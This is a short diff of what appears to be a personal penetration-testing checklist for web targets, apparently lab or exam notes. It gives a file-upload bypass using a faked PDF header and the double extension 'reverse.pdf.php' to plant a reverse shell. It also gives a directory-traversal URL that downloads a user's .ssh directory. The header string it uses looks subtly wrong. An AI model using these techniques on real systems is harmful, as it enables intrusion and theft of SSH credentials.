justeslam/offsec2/checklists/http.md

 THINK ABOUT LOCAL FILE INCLUSION.

-For PDF bypass, try to add the "%PHP 1.7\n%" thing at the top and change the name to reverse.pdf.php.
+For PDF bypass, try to add the "%PHP-1.7\n%" thing at the top and change the name to reverse.pdf.php.

 ```bash
 http://192.168.180.231/?cwd=../../../../../../../../home/remi&file=.ssh&download=true